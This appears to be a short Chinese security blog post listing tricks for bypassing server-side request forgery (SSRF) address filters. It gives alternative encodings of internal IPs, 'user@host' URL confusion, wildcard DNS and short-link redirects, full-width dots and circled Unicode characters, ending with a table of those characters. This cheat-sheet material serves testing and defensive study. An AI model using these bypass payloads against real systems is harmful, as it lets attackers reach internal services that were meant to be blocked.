SSRF绕过地址限制的一些trick

First Post:

2022-10-06

Last Update:

2023-04-22

Word Count:

274

Read Time:

1 min

SSRF绕过地址限制的一些trick

更改IP地址的表示

比如：192.168.0.1可以写为
●8进制格式: 0300.0250.0.1
●16进制格式: 0xC0.0xA8.0.1
●10进制整数格式: 3232235521
●16进制整数格式: 0xC0A80001
●省略模式，10.0.0.1 ==> 10.1，192.168.0.1 ==> 192.168.1

利用URL解析问题

在某些情况下，后端程序可能会对访问的URL进行解析,对解析出来的host地址进行过滤。这时候可能会出现对URL参数解析不当,导致可以绕过过滤。例如:

1.利用URL解析问题

http://www.baidu.com@192.168.0.1/ 与http://192.168.0.1

请求的都是192.168.0.1的内容

2.可以指向任意ip的域名xip.io: http://127.0.0.1.xip.io/ ==> http://127.0.0.1/

3.短地址 http://dwz.cn/114514 ==> http://127.0.0.1

但是现在短网址转换有很多限制，不建议使用，sad

4.利用句号。: 127。0。0。1==>127.0.0.1

5.利用Enclosed alphanumerics

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  ==> example.com

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ 
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

≡